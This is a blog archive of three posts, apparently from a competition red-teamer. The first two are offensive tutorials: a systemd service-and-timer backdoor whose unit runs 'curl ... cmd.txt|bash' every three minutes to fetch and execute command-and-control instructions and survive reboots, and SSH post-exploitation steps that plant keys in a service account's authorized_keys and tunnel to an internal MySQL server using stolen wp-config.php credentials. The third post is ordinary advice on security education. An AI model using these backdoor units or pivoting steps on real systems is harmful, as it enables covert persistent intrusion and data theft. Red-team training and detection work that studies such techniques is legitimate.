Category Archives: Linux

Establishing Persistence with systemd.timers

Posted on by

With the push to covert all of our old init style processes managers to the new cutting-edge systemd, comes a whole new set of security concerns. In several recent competitions, I was able to establish persistence with systemd.timer units. Timer units are designed to run repetitive tasks on behalf of an existing service. This is normally used to establish service watchers, in case a service were to hang of crash. However, we can take advantage of this build-in core functionality to establish near-kernel level persistence with systemd.timers. As an added bonus, it’s a bit more difficult to find then a crontab and there are several tools that can convert existing crontabs to systemd.timers.

In order to take advantage of persistence with systemd.timers, we just need write access to the /etc/systemd/system/ or /usr/lib/systemd/system/ directory. With a user with write access, normally only root, we can create a service unit file and a timer unit file. Once the files are created, we can register the timer unit with systemd and it will execute our service unit, per our timer unit schedule. Timer units can even be registered with systemd to be started at boot automatically, to maintain persistence through reboots.

Example persistence with systemd.timers

To establish persistence with systemd.timers, we first need to create a service unit. In this case I created a file called /etc/systemd/system/backdoor.service, which would connect to a web server and execute a the given command.

[Unit]
Description=Backdoor

[Service]
Type=simple
ExecStart=curl --insecure https://127.0.0.1/cmd.txt|bash

Next I created a timer unit that launches my backdoor.service every 3 mins, to execute my latest CnC commands. The following is the contents of the file, /etc/systemd/system/backdoor.timer, which I used throughout the CCDC competitions.

[Unit]
Description=Runs backdoor ever 3 mins

[Timer]
OnBootSec=5min
OnUnitActiveSec=3min
Unit=backdoor.service

[Install]
WantedBy=multi-user.target

Once those two files are created within one of the systemd unit directories, we can simple establish the persistence with systemd.timer, by starting the unit timer.

systemctl start backdoor.timer

Then to ensure the timer is automatically started a boot, tell systemd to enable the timer unit at startup.

systemctl enable backdoor.timer

As far as I can tell from my research, there isn’t any easy way to detect these types of backdoors. However, in the CCDC competition space, I highly recommend running a command like the following in a screen to identify changes to timer units.

watch -d systemctl list-timers

Example persistence with Single Service Unit

The alterative is to have a single service unit that takes advantage of an exit code of 0; to continuously restart. Bellow is an example of such a service unit file, that will just restart every 3 mins and also execute our CnC command.

[Service]
Type=simple
ExecStart=curl --insecure https://127.0.0.1/cmd.txt|bash; exit 0
Restart=always
RestartSec=180

For more detailed information see the full documentation at: https://www.freedesktop.org/software/systemd/man/ or through your local man pages.

So You Got a Shell: SSH for Linux Post Exploitation

Posted on by

So you worked hard to find that cool web application exploit and got a shell on the box. Many people not so familiar with the Linux operating system, quickly find themselves throwing there hand in the air and saying; Now what do I do? By popular demand, this is a list of some of my favorite SSH for Linux Post Exploitation techniques that I’ve used over and over in past Cyber Defense competitions and my career.

Note: I’m assuming that you will likely exploit a service level account, such as ftpd, www-data, ldapadmin, squid, apache or syslog, and not immediately have root level access on the system.

One of my overall favorites is utilizing SSH for linux post exploitation,  as a mean of developing access to systems on the internal network and to maintain access. Almost all Linux distro’s come with openssh-client baked in and many also have openssh-server set to run at startup by default. Fortunately, openssh’s config files ship with fairly basic security measures in place and expect system administrators to utilize the many additional security features, that are available, to defend systems. Most simply don’t bother.  Additionally the permissions on the /etc/ssh/ssh_conf and /etc/ssh/sshd_conf files are world readable by default. So start by just checking them out.

User$ cat /etc/ssh/ssh.conf

User$ cat /etc/ssh/sshd.conf

Within /etc/ssh/sshd_conf the default configuration allows for public file authentication; with the following line.

PubkeyAuthentication yes

This line allows for a public key to be passed to the system in order to authenticate as a specified user. This is done by adding your public key to the .ssh/authorized_keys file; under the users home directory structure. Once added you can use the simply ssh to the system, using your private key, while specifying the username.

Note: Most default system service accounts ship with /bin/false or /sbin/nologin as their default, which means ssh wont allow you to login directly via ssh.

So you are looking issued the command cat /etc/passwd and she that your user has no login shell and you say Michael this whole maintaining access with public keys in the authorized_keys file is useless to me. So how about another user of SSH for linux post exploitation; using your user to port forward into the local network over ssh?

So you get a web shell using some fancy new wordpress vulnerability and then you cat out the wp-config.php file and see that the database isn’t hosted on the local system. Now you have to pop another box to access that database right? Wrong. You can create a local port forward the the mysql port with ssh. by using the following command.

ssh -R 9000:<mysql server ip>:3306 www-data@localhost

So now maybe people are thinking of great I have to have a shell again…but www-data has /sbin/nologin! Thats fine we dont need a shell. Just follow the steps above. Use your web shell from the wordpress vulnerability to use ssh-keygen to generate the www-data users keys and .ssh directly. Then simply cat your public key into the .ssh/authorized_keys file, to give you a means of local authentication. You may not be able to get a local shell, but you can still ssh port forward by telling ssh not to use interactive login or allocate a tty with the following command.

ssh -v -nNT -R 9000:<mysql server ip>:3306 www-data@localhost

This will create an ssh tunnel that will port forward all traffic from 9000 to the mysql server on its default port. So simply issue the mysql command to connect on port 9000 and use the credentials in the wp-config.php file.

mysql -u wordpress -p -h <web server ip> -p 9000

Profit!

If you have any questions or want to know more just leave a comment or hit me up on social media.

My Honest Advice About Information Security Education

Posted on by

Now that I am a security professional and mentor, there is one question that still haunts me to this day. It’s that simple moment when an aspiring young hacker (formal use, as in enjoys figure out how things work), looks to the future and asks for advice in furthering their education. The question is normally placed in the form of “Where should I go to school?” or “What college do you recommend”. I hesitate to answer these types of questions, because honestly my answer would be none. I find it hard to bring myself to recommend any of the schools I’ve gone to or have heard of to an InfoSec geek like myself. In fact I wish someone would have sat me down a few years ago and told me the truth about prospects for education. Instead, I got the same old sales pitches for degree’s that severe all your needs, from the big universities. So, for anyone out there who is looking for barely honest advice on the topic of information security education, I offer up my experiences in clear text for your consumption.

The first and last piece of advice I would give anyone is that you will need to do a substance amount of learning on your own time. I don’t care what college one goes to, or what program they belong to, they will not cover the material you need to know to work in the field. Most of the schools I’ve heard of do not offer any classes in information security and if they do, it’s a theory class that goes to about the level of a CompTIA Security+ certification. I think there are two main causes of these issues, based upon the colleges I’ve attended. First Is just fear, they are scared of teaching the “dark arts” to students, because of both the legality that exists and the fact that students may use their knowledge for unethical means. The second is the shear lack of student interest, accreditation, and standardization that has led to a truly sluggish development of InfoSec course work. That being said, there has been a noticeable push by several government bodies to form a basis for preparing security professionals for the future. This effort, known as Centers of Academic Excellence in Information Security, is in its infancy and still only has the backing of a few large, slow-moving institutions. So needless to say, it stands to be quite a while before we see fully developed information security degrees. In fact based on speaking with several universities, I don’t expect to see a fully accredited Information Security Bachelor’s degree from a top 10 school until around 2020.

That being said, there is a real need in the current education landscape to supplement your education, with additional work outside the class room. The good news is for us InfoSec geeks, there is a lot of free and cost effective training out there for us. The bad news is, you will have to prove you were engages in it and/or justify it to any future employer.  This learning commonly takes place online and can be video lectures like those found on Udemy.com and coursera.org. Others can be rather cost effective courses taught by security professionals online, like Georgia Weidman, Joseph McCray, and Marcus Carey. I also highly recommend going to as well InfoSec conferences as possible as well, as they are a wealth of information and networking opportunities for a future career. Many of these conferences are free of charge, the bsides events, and many others have limit student rate tickets as well. Also be sure to get involved in as many of the InfoSec competitions as possible to brush up your skills. Some may require you to be a full time student at an accredited university, but still do as many as possible. Some of the major competitions for college students are CCDC, CyberWars, and NCL.

The other huge source of knowledge is technical certifications. These certifications can be a great learning opportunity and great proof of knowledge to an employer. However, in the Information Security Industry not all companies give certifications the same weight. In fact some may require you have or acquire a certification, while others many not even give you a pat on the pack for them. In fact, many certification exams have been getting easier and more expensive over the years as demand has gone up. This devalues the certification itself, and makes the cost much higher. For this reason, I recommend not getting cert happy while in school. As a side bar, I will recommend taking all certifications for any courses that will gain you credit for passing the certification exam itself. This will save you a signification amount of money and give you something else to really shine on a resume. There is nothing wrong with doing the course work for a certification and explaining that to an employer.  They will understand and you will find that a lot of employers will pay for certifications when you are in the work force. As such I recommend doing just that, if you take a course and like it, find the certification and study the material. Simply state you completed the course work on your resume instead of the certification itself and explain the cost barrier to any prospective employer. This makes a nice conversation piece during the interview process and will help with the cost. Just do not feel the need to go out and get all the certifications, they are rather costly to maintain and may not produce the desired result.

Now I would not necessarily say there is a requirement in this industry, to go to a collegiate institution. However from personal experience I will say many large corporations will require at least a 4 year degree before they will consider you. Most of the time however, the hiring process comes down to what you have done in the past and how you present that information to a hiring manager. Never the less if you are looking for a college or need to go, here are some helpful questions to find the right place.

  1. 1.       Does the college offer a course over open source software and operating systems (linux)?

This question is where I think many colleges currently fall short. Most universities I talked to, during my search for a school, were all about teaching Windows, Cisco, and Java.  These technologies may be the most common, but they will severally limit your abilities when it comes to a career in the field. I put Linux in as an example, because if they do not even teach an introduction to Linux you are going to be really hurting. The truth of the matter is most security professionals use Linux every day and develop their tools for it as well.

  1. How many courses do you have that relate to the security, integrity, confidentiality and availability of computer networks?

This question is almost self-explanatory, it seeks to drill down and ask how many courses you will get that will be directly related to your field. This will hopefully give you some additional information about the types of course you will be taking and how they might relate to your prospects for a career.

  1. Is there a student organization on campus that focuses computing, security, InfoSec, or Cyber Defense? If so, do they engage in competitions?

It is very import to be involved with active student organizations that exist on a school’s campus. In my experience these organizations offer more of a learning experience then most classes. If a school does not have any such organization it most likely is not that school for you. If it does, try and set up a meeting with several of the members. It is just as important to make sure you will mesh with any groups that exist there. Also check and see what professional or national organizations meet on campus or nearby, these groups will offer great networking opportunities and can be a good source of knowledge as well. Most importantly, figure out if any of the organizations participate in collegiate competitions. If they don’t, check with the dean or a few professors about the policies on engaging in such events. You might find that some school will not support these academic competitions and in which case, the school is probably not a good choice.

  1. Is this school accredited or do they do research in the realm of Information security?

Once again this will really speak to the quality of any program that exists at the prospective institution. Just be sure to ensure that the school holds a current version of the accreditation that they claim they have. If, they are doing information security research ask about the projects they are working on and who is involved. If it’s a single grad student or a professor who has an interest in security and are doing some research it might not be a good reason to go. Also be sure to check that the research is current and producing useable results, there is no reason to go to an institution with bad research practices.

  1. Are there any courses that require a certification for completion or follow a certification track?

As I stated earlier in my tangent about certifications, they are a double edged sword. If the institution focuses too heavily on certifications it may not be the best choice. However, on the other hand if they encourage and support their students in acquiring certifications as opposed to requiring it, they may very well be a good choice. Be sure to ask if they school has a certification center on campus. If they do, be sure to ask which certification companies they are contacted with. Also ask if vouchers or reduced rates are available for students.

 

Once you have chosen a university or school the next step is making the most out of the experience.  Now there are several ways to maximize your learning, and I will continue to update this list with more over time, but here are my top few.

  1. Get involved with student organizations and always strive to make them that one step better.
  2. Try your best to pass your knowledge on to the other students and expect the same in return.
  3. Find the professors who encourage you to orient your assignments toward your prospective career and take as many classes with them as possible.
  4. If your professor does not allow you to orient your work or doesn’t let you do it your way (and you still fulfill the assignment criteria), do it anyway, and if issues arise go straight to the dean.
  5. Try to get local or regional security professionals to give a talk at your institution.
  6. Never forget to have fun or you will burn out.
  7. Find internship opportunities and do the work you love.